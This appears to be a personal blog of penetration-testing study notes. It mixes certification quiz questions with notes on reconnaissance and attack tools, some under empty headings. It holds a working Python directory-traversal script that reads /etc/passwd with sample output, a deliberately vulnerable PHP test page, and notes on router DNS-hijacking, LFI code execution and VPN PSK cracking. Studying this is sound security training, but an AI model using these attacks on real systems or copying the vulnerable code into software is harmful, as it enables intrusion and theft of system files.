Saturday, June 22, 2019

Wireshark three-way handshake

A member of the pen test team enters this filter into Wireshark:

((tcp.flags == 0x02) || (tcp.flags == 0x12)) ||
((tcp.flags == 0x10) && (tcp.ack==1) && (tcp.len==0))



What is he attempting to view?


A. SYN, SYN/ACK, ACK

B. SYN, FIN, URG, and PSH

C. ACK, ACK, SYN, URG

D. SYN/ACK only


A is correct. Wireshark has the ability to filter based on a decimal numbering system assigned to TCP flags (basically the flag’s binary value assigned to the bit representing it in the header). The assigned flag decimal numbers are FIN = 1, SYN = 2, RST = 4, PSH = 8, ACK = 16, and URG = 32. Adding flag numbers together (for example, SYN + ACK = 18, or 0x12 in hex) allows you to simplify a Wireshark filter. For instance, tcp.flags == 0x02 looks for SYN packets, tcp.flags == 0x10 looks for ACK packets, and tcp.flags == 0x12 looks for SYN/ACK packets. In the case presented in the question, the filter will display all SYN packets, all SYN/ACK packets, and all bare ACK packets (the three steps of the three-way handshake).


B, C, and D are incorrect. These flags do not represent the values in the Wireshark filter.
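The flag arithmetic above is easy to check for yourself. Here is a minimal Python 3 sketch (an illustration only, not part of the exam answer) that ORs the flag bit values together and prints the hex values used in the Wireshark filter:

# Each TCP flag is one bit in the flags byte of the TCP header.
FLAGS = {"FIN": 1, "SYN": 2, "RST": 4, "PSH": 8, "ACK": 16, "URG": 32}

def flag_value(*names):
    # OR together the bit values of the named flags.
    total = 0
    for name in names:
        total |= FLAGS[name]
    return total

print(hex(flag_value("SYN")))         # 0x2  -> tcp.flags == 0x02
print(hex(flag_value("SYN", "ACK")))  # 0x12 -> tcp.flags == 0x12
print(hex(flag_value("ACK")))         # 0x10 -> tcp.flags == 0x10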

Sunday, June 16, 2019

hping3

root@mybox: # hping3 -A 192.168.2.x -p 80

Hping is a great tool that provides a variety of options. You can craft packets with it, audit and test firewalls, and do all sorts of crazy man-in-the-middle stuff. In this example, you’re simply performing a basic ACK scan (the -A switch) using port 80 (-p 80) on an entire Class C subnet (the x in the address runs through all 254 possibilities). Hping3, the latest version, is scriptable (in the Tcl language) and implements an engine that allows a human-readable description of TCP/IP packets.
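If you want to see what the single-host version of that ACK probe looks like in code, here is a rough Python sketch using scapy. This is an illustration only, not hping itself: it assumes scapy is installed, the script runs as root, and the target IP (192.168.2.1 here) is hypothetical:

from scapy.all import IP, TCP, sr1

def ack_probe(host, port=80):
    # Send a bare ACK; an RST reply suggests the port is unfiltered.
    reply = sr1(IP(dst=host)/TCP(dport=port, flags="A"), timeout=2, verbose=0)
    if reply is None:
        return "filtered (no response)"
    if reply.haslayer(TCP) and reply[TCP].flags & 0x04:  # RST bit set
        return "unfiltered (RST received)"
    return "unexpected response"

print(ack_probe("192.168.2.1"))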

Nmap questions and switches

You want to perform a ping sweep of a subnet within your target organization. Which of the following nmap command lines is your best option?

A.   nmap 192.168.1.0/24
B.   nmap -sT 192.168.1.0/24 - TCP Connect scan
C.   nmap -sP 192.168.1.0/24 - Ping sweep
D.   nmap -P0 192.168.1.0/24 - Scan without ping (ICMP)


 C. The -sP switch within nmap is designed for a ping sweep. Nmap syntax is fairly straightforward: nmap <scan options> <target>. If you don’t define a switch, nmap performs a basic enumeration scan of the targets. The switches, though, provide the real power of this tool.


  A is incorrect because this syntax will not perform a ping sweep. This syntax will run a basic scan against the entire subnet.

  B is incorrect because the -sT switch does not run a ping sweep. It stands for a TCP Connect scan, which is the slowest, but most productive (and loudest), scan option.

  D is incorrect because this syntax will not perform a ping sweep. The -P0 switch actually runs the scan without ping (ICMP). This is a good switch to use when you don’t seem to be getting responses from your targets; it forces nmap to start the scan even if it thinks the target doesn’t exist (which is useful if the computer is blocked by a firewall).
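If you ever want to drive that ping sweep from a script rather than the command line, a thin wrapper around the nmap binary is enough. A minimal sketch, assuming Python 3.7+ and nmap on the PATH; the output parsing is naive and only illustrative:

import subprocess

def ping_sweep(subnet="192.168.1.0/24"):
    out = subprocess.run(["nmap", "-sP", subnet],
                         capture_output=True, text=True).stdout
    # Live hosts appear on lines like: "Nmap scan report for 192.168.1.10"
    return [line.split()[-1] for line in out.splitlines()
            if line.startswith("Nmap scan report for")]

print(ping_sweep())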

metagoofil

Your team is hired to test a business named Matt’s Bait’n’ Tackle Shop (domain name mattsBTshop.com). A team member runs the following command:
metagoofil -d mattsBTshop.com -t doc,docx -l 50 -n 20 -f results.html
Which of the following best describes what the team member is attempting to do?
A.   Extracting metadata info from web pages in mattsBTshop.com, outputting results in Microsoft Word format
B.   Extracting metadata info from the results.html page in mattsBTshop.com, outputting results in Microsoft Word format
C.   Extracting metadata info from Microsoft Word documents found in mattsBTshop.com, outputting results in an HTML file
D.   Uploading results.html as a macro attachment to any Microsoft Word documents found in mattsBTshop.com



 C. This is an example of good tool knowledge and use. Metagoofil, per www.edge-security.com/metagoofil.php, “is an information gathering tool designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .docx, .pptx, .xlsx) belonging to a target company. It performs a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries like Hachoir, PdfMiner, and others. With the results, it will generate a report with usernames, software versions and servers or machine names that will help Penetration testers in the information gathering phase.”
In the syntax given, metagoofil will search mattsBTshop.com for up to 50 results (the -l switch determines the number of results) of any Microsoft Word documents (in both .doc and .docx formats) it can find. It will then attempt to download the first 20 found (the -n switch handles that), and the -f switch will send the results where you want (in this case, to an HTML file).
And just what will those results be? Well, that’s where the fun comes in. Remember, metagoofil tries to extract metadata from publicly available Microsoft Word documents on the site. You might find e-mail addresses, document paths, software versions, and even usernames in the results.
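To get a feel for what that metadata looks like, you can pull the same kinds of fields from a single Word document yourself with the python-docx library. A hedged sketch, not metagoofil itself; the filename is hypothetical:

from docx import Document

doc = Document("downloaded_file.docx")   # stand-in for a document metagoofil fetched
props = doc.core_properties              # Word core properties travel with the file
print("Author:          ", props.author)
print("Last modified by:", props.last_modified_by)
print("Created:         ", props.created)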


Metagoofil
Metagoofil is a tool that utilizes the Google search engine to get metadata from the documents available in the target domain. Currently, it supports the following document types:

Word documents (.docx, .doc)
Spreadsheet documents (.xlsx, .xls, .ods)
Presentation files (.pptx, .ppt, .odp)
PDF files (.pdf)
Metagoofil works by performing the following actions:

Searching for all of the preceding file types in the target domain using the Google search engine
Downloading all of the documents found and saving them to the local disk
Extracting the metadata from the downloaded documents
Saving the result in an HTML file
The metadata that can be found includes the following:

Usernames
Software versions
Server or machine names
This information can be used later on to help in the penetration testing phase. Metagoofil is not part of the standard Kali Linux 2.0 distribution. To install it, all you need to do is use the apt-get command:

    # apt-get install metagoofil
After the installer package has finished, you can access Metagoofil from the command line:

    # metagoofil
This will display simple usage instructions and an example on your screen. As an example of Metagoofil usage, we will collect all the DOC and PDF documents (-t doc,pdf) from a target domain (-d example.com) and save them to a directory named test (-o test). We limit the search for each file type to 20 results (-l 20) and only download five files (-n 5). The generated report will be saved to test.html (-f test.html). We give the following command:

    # metagoofil -d example.com -l 20 -t doc,pdf -n 5 -f test.html -o test 

Windows Server 2016 Administration Fundamentals

Questions

  1. Windows Server 2016 is Apple's latest operating system for servers. (True | False)
  2. The __________________ is a group of computers connected to each other in order to share resources.
  3. Which of the following are computer network components? (Choose two)
    1. computers
    2. servers
    3. Master Boot Record (MBR)
    4. Basic Input/Output System (BIOS)
  4. Resources can be data, network services, and peripheral devices. (True | False)
  5. Which of the following are Windows Server 2016 editions? (Choose three)
    1. Windows Server 2016 Essentials
    2. Windows Server 2016 Standard
    3. Windows Server 2016 Datacenter
    4. Windows Server 2016 Enterprise
  6. _________________________ is a web portal that provides the option to download and evaluate Microsoft's products free of cost.
  7. Which of the following are server size and form factors? (Choose two)
    1. Blade servers
    2. Tower servers
    3. Network printer
    4. Network switch
  8. The Start menu has returned in Windows Server 2016. (True | False)
  9. _____________ is any device that can generate, receive, and transmit networking resources on the computer network.
  10. Which of the following hardware components affect the performance of your servers? (Choose two)
    1. Processor
    2. RAM
    3. Printer
    4. Monitor
  11. A server is a computer that requests resources in a computer network. (True | False)
  12. ________________ networking is a computer network in which the participating computers do not have predefined roles in the network.
Chapter 1 — Answers
  1. False
  2. Computer network
  3. Computers; Servers
  4. True
  5. Windows Server 2016 Essentials; Windows Server 2016 Standard; Windows Server 2016 Datacenter
  6. TechNet Evaluation Center
  7. Blade servers; Tower servers
  8. True
  9. Node
  10. Processor; RAM
  11. False
  12. Peer-to-Peer (P2P)

Saudi Aramco explanation



WannaCry explanation


System Operations: An Overview of AWS

1.   Which of the following AWS management tools enables you to retain account activity pertaining to actions performed within your AWS infrastructure?

A.   AWS CloudWatch

B.   AWS CloudFront

C.   AWS CloudTrail

D.   AWS Config

2.   Which of the following are true when you use the Amazon Elastic File System (EFS)? (Choose two)

A.   Multiple EC2 instances can simultaneously access the same EFS file system.

B.   Multiple EC2 instances can’t access the same EFS file system at the same time.

C.   EC2 instances can connect only to EBS storage.

D.   EFS will automatically scale on demand.

3.   Which of the following AWS services enables you to view system-wide resource utilization, application performance, and the health of the various AWS system components?

A.   AWS OpsWorks

B.   Amazon CloudWatch

C.   AWS CloudTrail

D.   AWS CloudFront

4.   Which of the following tools helps you review configuration changes and analyze the resource configuration histories?

A.   AWS Config

B.   AWS CloudTrail

C.   AWS Systems Manager

D.   AWS CloudWatch

5.   Which one of the following AWS services acts as a virtual firewall to control Internet traffic for EC2 instances?

A.   Amazon Virtual Private Cloud

B.   Availability zones

C.   Security groups

D.   Network access control lists

6.   You currently run several web servers hosted on Amazon EC2 instances. To which of the following services can you move your static web sites, instead of using EC2 instances to run them?

A.   Amazon Route 53

B.   Amazon Simple Storage Service (Amazon S3)

C.   Amazon RDS

D.   Amazon CodeDeploy

7.   Which of the following location-related concepts provides high availability and fault tolerance for the applications that you run in the AWS cloud?

A.   Availability zones

B.   Content delivery networks

C.   AWS regions

D.   Edge locations

8.   Which of the following are true regarding regions and availability zones? (Choose two)

A.   All regions are connected via high-speed links.

B.   Availability zones in all the regions are tightly connected with one another.

C.   All regions are separated from one another.

D.   All availability zones within each region are connected via high-speed links.

9.   Which of the following storage types offers “query-in-place” functionality, enabling you to run analytics directly on the data you store (data-at-rest) through Amazon Athena?

A.   Amazon Elastic File Service (Amazon EFS)

B.   Amazon Simple Storage Service (Amazon S3)

C.   Amazon Elastic Container Service (Amazon ECS)

D.   Amazon Glacier

10.   Which of the following AWS services helps you connect your on-premise data center to the AWS cloud with a dedicated network connection from your on-premise network directly to your Amazon VPC?

A.   Amazon Virtual Private Cloud (Amazon VPC)

B.   AWS Direct Connect

C.   Amazon Route 53

D.   Availability zone

11.   What is the deployment unit in AWS Lambda?

A.   A virtual server

B.   A container

C.   A microservice

D.   Code

12.   Which of the following storage types offers a file system interface to storage?

A.   Amazon EFS

B.   Glacier

C.   Amazon EBS

D.   Instance storage

13.   Which of the following AWS services helps you treat the AWS infrastructure as code?

A.   Amazon CloudWatch

B.   AWS OpsWorks

C.   Amazon CloudControl

D.   Amazon CloudTrail

14.   Which of the following AWS cloud services helps with your IT governance, compliance, and auditing requirements?

A.   Amazon CloudWatch

B.   AWS OpsWorks

C.   Amazon CloudControl

D.   Amazon CloudTrail

15.   You periodically run several heavy data processing jobs in the AWS cloud. After you complete the data processing, you’d like to retain the data on the Amazon EC2 file system, although you’re going to shut down the Amazon EC2 instance to keep from incurring charges between your jobs. Which of the following AWS cloud services helps you store data on a persistent basis in these types of situations?

A.   Amazon Glacier

B.   Amazon Simple Storage Service (Amazon S3)

C.   Amazon Elastic Block Store (Amazon EBS)

D.   Amazon RDS

16.   Which of the following architectures extends your on-premise infrastructure into a cloud such as the AWS cloud so you can connect the cloud resources to your data center?

A.   AWS Direct Connect

B.   Amazon S3

C.   A public cloud architecture

D.   A hybrid cloud architecture

17.   You notice huge spurts in your online customer traffic to your e-commerce web site around your heavily promoted quarterly sales events. Which of the following features or services can you use to handle the spurts in customer traffic during the sales events?

A.   Auto Scaling

B.   Amazon Simple Storage Service (Amazon S3)

C.   AWS Lambda

D.   AWS Snowball

18.   Which of the following architectural layers are part of a three-tier architecture? (Choose three)

A.   Storage layer

B.   Front-end web server layer

C.   Database layer

D.   Application layer

19.   Which of the following AWS cloud services is a fully managed NoSQL database service?

A.   Amazon Relational Database Service (Amazon RDS)

B.   Amazon Aurora

C.   Amazon ElastiCache

D.   Amazon DynamoDB

20.   Which of the following AWS cloud services enables you to work in a logically isolated section of the cloud where you can launch your AWS resources into a virtual network you define?

A.   Amazon Route 53

B.   Amazon Virtual Private Cloud (Amazon VPC)

C.   Amazon Security Groups

D.   Amazon API Gateway

21.   Which of the following AWS cloud services would you use to decouple your user-facing applications from your backend services such as a database?

A.   Amazon CloudTrail

B.   Amazon Simple Queue Service (Amazon SQS)

C.   Amazon Simple Notification Service (Amazon SNS)

D.   AWS Lambda

22.   Under the shared responsibility security model, which of the following would be the responsibility of the cloud provider? (Choose two)

A.   Power supplies to the compute instances

B.   Data center physical security

C.   Configuration of the AWS provided security group firewall

D.   Database credentials and roles

23.   Which of the following AWS services helps you automate your code deployment?

A.   AWS CodeDeploy

B.   AWS CodePipeline

C.   AWS Systems Manager

D.   AWS CodeCommit

24.   You’re interested in finding out the origination point for an API call, as well as the times when the call was made. Which of the following tools will help you get the information you’re looking for?

A.   AWS CloudWatch

B.   AWS Systems Manager

C.   AWS CodeDeploy

D.   AWS CloudTrail

25.   Which of the following information does the AWS CloudTrail service track? (Choose two)

A.   User activity

B.   Resource usage

C.   Application usage

D.   API calls

26.   Which of the following is not a means of accessing the AWS cloud platform?

A.   AWS SDK

B.   AWS CLI

C.   AWS Management Console

D.   Chef and Puppet



Answers

1.   C. CloudTrail tracks all user activity and records the API usage.

2.   A, D. A is correct because more than one EC2 instance can access the same EFS file system. D is correct because EFS automatically scales on demand without your having to provision anything.

3.   B. CloudWatch is a monitoring service that shows resource utilization, application performance, and the health of the AWS system components.

4.   A. AWS Config records configuration changes to all AWS resources.

5.   C. Security groups are like firewalls that control traffic into and out of the EC2 instances.

6.   B. You can store your static web content in S3 and serve it directly from S3, instead of hosting web servers on EC2 instances.

7.   A. There are multiple availability zones within each AWS region, providing higher availability and resilience for your applications.

8.   C, D. Regions are geographically separated from one another, and all availability zones within a region are connected via low-latency network connections.

9.   B. You can directly query data that you store in S3.

10.   B. AWS Direct Connect enables you to connect your on-premise data centers and offices to the AWS cloud, to enable fast transmission of data.

11.   D. The deployment unit in AWS Lambda is code because it employs a serverless architecture.

12.   A. Amazon EFS offers a file system interface to storage in AWS.

13.   B. AWS OpsWorks is a configuration management service that provides managed instances of Chef and Puppet, enabling you to treat your infrastructure as code.

14.   D. CloudTrail tracks user activity and API usage, and this information is useful for auditors who want to examine your governance, compliance, and auditing requirements.

15.   C. EBS offers persistent storage that will remain intact after you shut down the EC2 instances.

16.   D. A hybrid cloud architecture is where you use your on-premise and public cloud infrastructures as a single infrastructure.

17.   A. Auto Scaling is an AWS feature that helps you handle spurts in demand for your applications by automatically scaling your EC2 instances up or down.

18.   B, C, D. The three-tier architecture consists of the web server, database, and application layers.

19.   D. Amazon DynamoDB is a fully managed NoSQL database.

20.   B. Amazon VPC is a logically isolated section of the AWS cloud where you can launch your AWS resources into your own private virtual network.

21.   B. Amazon Simple Queue Service (SQS) is a fully managed message queuing service that helps you decouple and scale microservices, distributed systems, and serverless applications. SQS helps decouple and coordinate components of a cloud application. You can send, store, and receive messages between software components at high volume using SQS as the messaging service.

22.   A, B. In the shared responsibility security model, the cloud provider (AWS) is responsible for securing the cloud infrastructure. This includes securing the power supplies and physical security of the data center.

23.   A. CodeDeploy is a service that automates software deployments to compute services such as EC2, AWS Lambda, and instances running in your on-premise data centers.

24.   D. CloudTrail tracks and records all user activity and API usage in the AWS cloud.

25.   A, D. CloudTrail tracks and records user activity and API usage in the AWS cloud.

26.   D. Chef and Puppet are configuration management tools.
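Two of the answers above lend themselves to a quick code illustration. The Python sketch below ties back to answer 11 (in Lambda, the deployment unit is code) and answer 21 (SQS decouples front-end applications from backend services). It assumes boto3 is installed and AWS credentials are configured; the queue URL is hypothetical:

import boto3

# Answer 11: the deployment unit in Lambda is code -- for Python, a handler function.
def handler(event, context):
    # Lambda invokes this with the event payload; there is no server to manage.
    return {"statusCode": 200, "body": "processed"}

# Answer 21: SQS decouples a user-facing producer from a backend consumer.
sqs = boto3.client("sqs")
queue_url = "https://sqs.us-east-1.amazonaws.com/123456789012/example-queue"  # hypothetical
sqs.send_message(QueueUrl=queue_url, MessageBody="order-42")           # producer side
msgs = sqs.receive_message(QueueUrl=queue_url, MaxNumberOfMessages=1)  # consumer side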

Kill Chain Hacking


Approaches for hacking





Armitage - hail mary


There is much more to Armitage than can be explained by the short introduction provided by this text. For more details, take a look at the Armitage manual, available at http://www.fastandeasyhacking.com/manual.

root@kali:~# apt-get install armitage

Exam Ref: MS-101 Microsoft 365 Mobility and Security

Thought experiment

In this thought experiment, demonstrate your skills and knowledge of the topics covered in this chapter. You can find the answer to this thought experiment in the next section.
Alpine Ski House is a global organization, spanning 200 locations and supporting 25,000 mobile devices. Some offices have slow WAN links, but all locations have fast Internet connections. The organization is using ConfigMgr for device management and deployment. All employees are registered in Azure AD and have an Office 365 license assigned. Last year they started introducing Windows 10 through a traditional bare metal deployment. 2,500 devices are running Windows 10, version 1803 and the remaining fleet is running Windows 8.1. Your manager has tasked you with creating a deployment plan for fully adopting Windows 10 over the next 6 months and keeping current with new releases. As the technical lead for enterprise device management, you have started testing the in-place upgrade using ConfigMgr, going from Windows 8.1 to Windows 10. Some devices upgraded successfully, and others failed. As part of your deployment design you need to address the following questions, while minimizing on-premises infrastructure:
  1. The in-place upgrade from Windows 8.1 to Windows 10 has identified some compatibility issues. What solution should you implement to track compatibility for your fleet and what steps do you need to take to implement this solution?
  2. Windows 10 Enterprise 64-bit is the target operating system for your fleet. Through a recent discovery you found 5% of your Windows 8.1 devices are 32-bit. What solution will you use to upgrade these devices?
  3. What servicing channels should you adopt to keep current with the latest releases of Windows 10 and what steps do you need to take to implement them?
  4. The 2,500 devices running Windows 10 need to be upgraded to version 1809. What solution should you implement to upgrade these devices?
  5. Your CIO is asking you to begin migrating MDM workloads to Intune. What MDM solution addresses this requirement?

Thought experiment answers

This section contains the solution to the thought experiment. Each answer explains why the answer choice is correct.
  1. To address compatibility issues with Windows 10 you should implement Upgrade Readiness. To accomplish this, you will need to create the Log Analytics workspace in Azure. After creating the workspace, you should create and deploy a GPO with Windows telemetry enabled and set to Basic, along with your commercial ID. The Windows 8.1 computers will also need KB2976978 installed before they can upload data.
  2. The Windows 8.1 computers will need to be upgraded using a refresh or replace deployment method. The user state can be captured with ConfigMgr and restored after the device has been re-imaged using a Windows 10 64-bit installation.
  3. To support the latest release of Windows 10, you should adopt Semi-Annual Channel (Targeted) and plan for the Windows Insider channel to prepare for new versions of the operating system. You should use a GPO to configure the servicing channel.
  4. You should use Windows Update for Business to manage the upgrade from Windows 10, version 1803 to Windows 10, version 1809.
  5. The best solution is to use Microsoft Intune with co-management enabled in ConfigMgr. This solution will deliver a cloud-based MDM with support for iOS, Android, and Windows 10. This will also enable the organization to transition workloads for Windows 10 from ConfigMgr to Microsoft Intune. The existing devices enrolled in MDM for Office 365 can also be assigned EMS licenses and can be converted to Intune.

Trity - advanced pentesting framework

Trity

Trity is an advanced pentesting framework dedicated to everything from vulnerability testing to cryptography.

Installation & Usage

In order to install this program, it is crucial that you are on a Linux-based distro, preferably Kali Linux or BackBox.
First, clone the repository:
git clone https://github.com/toxic-ig/Trity.git






Spike Pentester Fuzz

https://github.com/Ara2104/vulnserver







searchsploit with two variables


macchanger - mac address


syn flood using python


SQL columns and tables - python







slumber.py - python - exploit - automate



webinject.py




FTP banner grabbing - python - urllib url open banner grabbing





Banner test and portscan test using python




Python - Crypt - password


Create your own dict.txt

Bash scripting




Monday, June 10, 2019

Nmap -p80 --script http-enum

Nmap -p80 --script http-enum


These options tell Nmap to launch the http-enum script if a web server is found on port 80.


  PORT STATE SERVICE
   80/tcp open  http
   | http-enum:
   |_  /crossdomain.xml: Adobe Flash crossdomain policy

   PORT   STATE SERVICE
   80/tcp open  http
   | http-enum:
   |   /administrator/: Possible admin folder
   |   /administrator/index.php: Possible admin folder
   |   /home.html: Possible admin folder
   |   /test/: Test page
   |   /logs/: Logs
   |_  /robots.txt: Robots file


$ nmap --script http-enum --script-args http-enum.fingerprintfile=./myfingerprints.txt -p80 <target>

By default, http-enum uses the root directory as the base path. To set a different base path, use the http-enum.basepath script argument:

$ nmap --script http-enum --script-args http-enum.basepath=/web/ -p80 <target>


To display all entries that returned a status code that could indicate a page, use the http-enum.displayall script argument:

$ nmap --script http-enum --script-args http-enum.displayall -p80 <target>


$ nmap --script http-enum --script-args http-enum.nikto-db-path=<Path to Nikto DB file> -p80 <target>  

Monitor mode on airmon-ng

Before proceeding, let's put our Wi-Fi card into monitor mode. Much like promiscuous mode in Wireshark, monitor mode allows us to see additional traffic on top of the traffic destined for our wireless card. We will use the airmon-ng script, part of the Aircrack-ng suite, to put the Alfa card into monitor mode. First, make sure that no running processes will interfere with monitor mode:

root@kali:~# airmon-ng check
root@kali:~# airmon-ng check kill
root@kali:~# airmon-ng start wlan0

             (monitor mode enabled on mon0)

The Harvester: discovering and leveraging e-mail addresses


An excellent tool to use in reconnaissance is the Harvester. The Harvester is a simple but highly effective Python script written by Christian Martorella at Edge Security. This tool allows us to quickly and accurately catalog both e-mail addresses and subdomains that are directly related to our target.

It is important to always use the latest version of the Harvester, as many search engines regularly update and change their systems. Even subtle changes in a search engine's behavior can render automated tools ineffective. In some cases, search engines will filter the results before returning the information to you. Many search engines also employ throttling techniques that attempt to prevent you from running automated searches.

The Harvester is built into Kali. The quickest way to access it is to open a terminal window and issue the command theharvester. If you need the full path to the program and you are using Kali, the Harvester (and nearly every other tool) can be found in the /usr/bin/ directory. However, remember that a major advantage of Kali is that you no longer need to specify the full path to run these tools. Simply open a terminal and enter the tool's start command. For example, to run the Harvester, open a terminal and run the following command:

  theharvester

You can also issue the full path to run the program:

  /usr/bin/theharvester

If you are using a different version of Backtrack or Kali, or cannot locate the Harvester (or any tool discussed in this book) at the specified path, you can use the locate command to help find where the tool is installed. To use the locate command, you first need to run the updatedb command. To find where the Harvester is installed on your system, open a terminal and enter the command:

  updatedb

Followed by the command:

  locate theharvester

The output of the locate command can be very verbose, but a careful review of the list should help you determine where the missing tool is installed. As mentioned earlier, nearly all of the penetration testing tools in Kali are located in a subdirectory of the folder

/usr/bin/

ALERT!

If you are using an operating system other than Kali, you can download the tool directly from Edge Security at http://www.edge-security.com. Once you have downloaded it, you can extract the downloaded tar file by running the following command in a terminal:

   tar xf theHarvester

Please note the capital "H" used when extracting the code. Linux is case sensitive, so the operating system sees a difference between "theHarvester" and "theharvester".

Make sure you are in the Harvester folder and run the following command:

  ./theharvester.py -d testedocurso.com -l 10 -b google

This command will search for e-mails, subdomains, and hosts that belong to testedocurso.com.



A lowercase -d is used to specify the target domain.

A lowercase -l (that is an L, not a 1) is used to limit the number of results returned to us. In this case, the tool was instructed to return only 10 results.

The -b is used to specify the public repository we want to search. We can choose from a wide variety, including Google, Bing, PGP, LinkedIn, and more.

Automated URL-based directory traversal



Occasionally, websites call files using unrestricted functions; this can allow the fabled directory traversal or direct object reference (DOR) attack. Here, a user can call arbitrary files within the context of the website by using a vulnerable parameter. There are two ways this can be manipulated: first, by providing an absolute path such as /etc/passwd, which says "from the root directory, browse to the etc directory and open the passwd file"; and second, by providing relative paths that travel up directories in order to reach the root directory and then down to the intended file.

The script below attempts to open a file that is always present on a Linux machine (the aforementioned /etc/passwd) by gradually increasing the number of up directories prepended to a parameter in a URL. It identifies success by detecting the phrase root, which indicates that the file has been opened.

Getting ready
Identify the URL parameter that you wish to test. This script has been configured to work with most devices: etc/passwd should work with OS X and Linux installations, and boot.ini should work with Windows installations. See the end of this example for a PHP web page that can be used to test the validity of the script.

We will be using the requests library, which can be installed through pip. In the author's opinion, it's better than urllib in terms of functionality and usability.

How to do it…
Once you've identified the parameter you want to attack, pass the target URL to the script as a command line argument. Your script should look like the following:

import requests
import sys

# Target URL, including the vulnerable parameter, e.g. http://host/page.php?id=
url = sys.argv[1]

# File to request -> string we expect to see if the file was actually opened.
payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}
up = "../"

for payload, string in payloads.iteritems():
  for i in xrange(7):
    req = requests.post(url+(i*up)+payload)
    if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break
The following is an example of the output produced when using this script:

Parameter vulnerable

Attack string: ../../../../../etc/passwd

Get me /etc/passwd! File Contents:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
How it works…
We import the libraries we require for this script, as with every other script we've done in the module so far:

url = sys.argv[1]
We then take our input in the form of a URL. As we are using the requests library, we should ensure that our URL matches the form requests is expecting, which is http(s)://url. Requests will remind you of this if you get it wrong:

payloads = {'etc/passwd': 'root', 'boot.ini': '[boot loader]'}
We establish the payloads which we are going to send in each attack in a dictionary. The first value in each pair is the file that we wish to attempt to load and the second is a value that will definitely be within that file. The more specific that second value is, the fewer false positives that will occur; however, this may increase the chances of false negatives. Feel free to include your own files here:

up = "../"
i = 0
We provide the up directory shortcut ../ and assign it to the up variable and we set the counter for our loop to 0:

for payload, string in payloads.iteritems():
  for i in xrange(7):
The iteritems method allows us to go through the dictionary and take each key and value, assigning them to variables: the first value becomes payload and the second becomes string. The inner for loop caps the attempts to stop the script repeating forever in the event of a failure. I have set this to 7, though it can be any value you please; bear in mind how unlikely it is that a web app's directory structure is more than 7 levels deep:

req = requests.post(url+(i*up)+payload)
We craft our request by taking our root URL and appending the current number of up directories (from the loop counter) and the payload. This is then sent in a POST request:

if string in req.text:
      print "Parameter vulnerable\r\n"
      print "Attack string: "+(i*up)+payload+"\r\n"
      print req.text
      break
We check whether we have achieved our goal by looking for our intended string in the response. If the string is present, we halt the loop and print out the attack string, along with the response to the successful attack. This allows us to manually verify whether the attack was successful, whether the code needs to be refactored, or whether the web app simply isn't vulnerable.

Because the attempts are driven by the for loop, the counter runs up to the preset maximum of 7 and resets automatically for the next attack string.

There's more…
This recipe can be adapted to work with parameters through the application of the principles shown elsewhere in the module. However, given how rarely pages are called through parameters, and for brevity, this has not been provided.

This can be extended, as mentioned earlier, by adding additional files and their commonly occurring strings (see the sketch below). It could also be extended to grab all interesting files once the ability to traverse directories, and the depth required to reach root, has been established.
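As a quick illustration of that first extension, here is a hedged sketch of extra entries you might add to the payloads dictionary. The files and marker strings are common defaults, not guaranteed to exist on every target:

# Hypothetical extra targets: file to request -> string expected inside it.
payloads.update({
    'etc/hosts': 'localhost',        # present on most Linux/OS X hosts
    'windows/win.ini': '[fonts]',    # present on most Windows installs
})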

The following is a PHP web page that will allow you to test this script on your own build. Just put it in your /var/www directory (or wherever your web root is). Do not leave this active on an unknown network:

<?php
echo "Get me /etc/passwd! File Contents";
if (!isset($_REQUEST['id'])) {
  header('Location: /traversal/first.php?id=1');
}
if (isset($_REQUEST['id'])) {
  if ($_REQUEST['id'] == "1") {
    $file = file_get_contents("data.html", true);
    echo $file;
  } else {
    $file = file_get_contents($_REQUEST['id']);
    echo $file;
  }
}
?>

Sunday, June 9, 2019

Server 2016 HA


Local file inclusion exploitation tool


liffy


A little Python tool to perform local file inclusion (LFI).


Liffy v2.0 is the improved version of liffy, which was originally created by rotlogix/liffy. The original repository is no longer available, and the fork had not seen any development for a long time.
Main features
data:// for code execution
expect:// for code execution
input:// for code execution
filter:// for arbitrary file reads
/proc/self/environ for code execution in CGI mode
Apache access.log poisoning
Linux auth.log SSH poisoning
Direct payload delivery with no stager
Support for absolute and relative path traversal
Support for cookies for authentication
Contribution


Suggest a feature (like any other technique to exploit LFI)


Report a bug


Fix something and open a pull request


In any case, feel free to open an issue.
Credits


All the exploitation techniques are taken from liffy


Logo for this project is taken from renderforest

Hunting routers with Routerhunter

Routerhunter is a tool used to find vulnerable routers on a network and run various attacks to exploit the DNSChanger vulnerability. This vulnerability allows an attacker to change the router's DNS server, directing all traffic to the desired websites.


git clone https://github.com/Exploit-install/Routerhunter-2.0.git



Once the repository has been cloned, enter the directory.
Run the following command:
python routerhunter.py -h


We can supply Routerhunter with an IP range, DNS server IPs, and so on.

Using proxychains with Tor

To use proxychains with Tor, we first need to install Tor using the following command:
apt-get install tor
Once installed, we run Tor by typing tor in the terminal.
We then open another terminal and type the following command to run an application through proxychains:


proxychains toolname -arguments

proxychains nmap -arguments


Pentesting VPNs - ike-scan

For this method, we will use the ike-scan and ikeprobe tools. First, we install ike-scan by cloning the Git repository:

git clone https://github.com/royhills/ike-scan.git


How to do it...
Navigate to the directory where ike-scan is installed.
Install autoconf by running the following command:
apt-get install autoconf
Run autoreconf --install to generate a .configure file.
Run ./configure.
Run make to build the project.
Run make check to verify the build stage.
Run make install to install ike-scan.
To scan a host for an Aggressive mode handshake, use the following command:
   ike-scan x.x.x.x -M -A

Sometimes we will only see a response after providing a valid group name, such as vpn:

ike-scan x.x.x.x -M -A id=vpn

To see the list of all available options, we can run the following command:
ike-scan -h


We can even brute force the group names using the script at the following link: https://github.com/SpiderLabs/groupenum.
Here is the command:
./dt_group_enum.sh x.x.x.x groupnames.dic



Cracking the PSK

  1. Adding a -P flag to the ike-scan command will show a response with the captured hash.
  2. To save the hash, we provide a filename along with the -P flag.
  3. Next, we can use psk-crack with the following command:
psk-crack -b 5 /path/to/pskkey
Here -b selects brute force mode, with 5 as the maximum key length.
  4. To use a dictionary-based attack, we use the following command with the -d flag to supply the dictionary file:
